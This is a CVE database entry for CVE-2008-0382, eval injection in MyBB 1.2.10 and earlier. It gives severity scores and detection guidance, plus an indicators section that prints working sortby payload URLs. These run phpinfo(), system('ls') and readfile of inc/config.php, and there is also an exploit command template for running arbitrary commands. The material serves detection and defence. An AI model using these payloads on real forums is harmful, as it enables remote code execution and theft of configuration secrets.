cbcvebase.
CVE-2008-0382
published 2008-01-22

CVE-2008-0382: Multiple eval injection vulnerabilities in MyBB 1.2.10 and earlier allow remote attackers to execute arbitrary code via the sortby parameter to (1)…

PriorityP261high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
41.87%
98.5th percentile
Multiple eval injection vulnerabilities in MyBB 1.2.10 and earlier allow remote attackers to execute arbitrary code via the sortby parameter to (1) forumdisplay.php or (2) a results action in search.php.

Affected

19 ranges
VendorProductVersion rangeFixed in
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard
mybulletinboardmybulletinboard

Detection & IOCsextracted from sources · hover to see the quote

urlforumdisplay.php?fid=2&sortby='];phpinfo();exit;//
urlforumdisplay.php?fid=2&sortby='];system('ls');exit;//
urlforumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//
urlsearch.php?action=results&sid=[valid sid here]&sortby='];phpinfo();exit;//
urlsearch.php?action=results&sid=[valid sid here]&sortby='];system('ls');exit;//
urlsearch.php?action=results&sid=[valid sid here]&sortby='];readfile('inc/config.php');exit;//
pathforumdisplay.php
pathsearch.php
pathinc/config.php
commandforumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['
  • Detect eval injection attempts via the `sortby` GET parameter containing PHP injection payloads (e.g., `'];`, `phpinfo()`, `system(`, `readfile(`) in requests to forumdisplay.php or search.php.
  • Monitor for the exploit's output delimiter pattern — asterisk-wrapped command output (`*<output>*`) in HTTP responses, used by the exploit script to parse remote command execution results.
  • Requests to search.php must include `action=results` alongside a malicious `sortby` parameter; detection rules should match both parameters together for this attack vector.
  • No authentication is required for exploitation; the attacker only needs a valid forum `fid` (for forumdisplay.php) or a valid search `sid` (for search.php), both of which are trivially obtainable.
  • ·The forumdisplay.php attack vector requires a valid forum `fid` to be known by the attacker, but this is typically publicly visible in any forum listing.
  • ·The search.php attack vector requires a valid search `sid`, but the advisory notes this is a trivial prerequisite to satisfy.
  • ·Both RCE vectors are present in MyBB 1.2.10 and earlier; upgrading to 1.2.11 remediates the vulnerability.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.